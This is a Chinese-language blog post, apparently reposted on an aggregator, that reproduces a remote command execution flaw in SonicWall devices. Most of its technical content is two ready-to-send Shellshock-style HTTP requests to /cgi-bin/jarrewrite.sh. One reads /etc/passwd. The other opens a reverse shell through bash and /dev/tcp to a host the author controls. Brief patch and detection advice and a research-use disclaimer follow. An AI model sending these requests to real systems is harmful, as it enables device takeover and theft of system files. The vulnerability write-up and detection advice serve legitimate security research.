SonicWall远程命令执行漏洞
?
SonicWall 遠程命令執行漏洞
一、漏洞描述
?
SonicWall歷史版本遠程命令執行漏洞以及相關利用腳本。由于SonicWall 使用了舊版本內核以及HTTP CGI 可執行程序,攻擊者可構造惡意其HTTP請求頭,造成遠程任意命令執行,并獲得主機控制權限
二、漏洞復現
exp:
GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080 User-Agent: () { :; }; echo ; /bin/bash -c "cat /etc/passwd" Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close
訪問執行查看:cat /etc/passwd
執行反彈shell
GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080? User-Agent: () { :; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/thelostworld/8080 0>&1 &" Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close
成功獲取到shell:
簡單的腳本嘗試驗證:
三、防護修補建議
通用修補建議
升級到?Sonic SMA 8.0.0.4
臨時修補建議
針對 http header 進行檢測
可能存在的特征字符串如下() { :; };
?
參考:
?https://my.oschina.net/u/4600927/blog/4927559
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與你并肩前行!!!!
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
個人簡書:https://www.jianshu.com/u/bf0e38a8d400
個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
個人博客園:https://www.cnblogs.com/thelostworld/
FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article
歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”
?
總結
以上是生活随笔為你收集整理的SonicWall远程命令执行漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 计算机键盘无法使用 怎么办,电脑键盘失灵
- 下一篇: 结合原理与代码理解BiLSTM-CRF模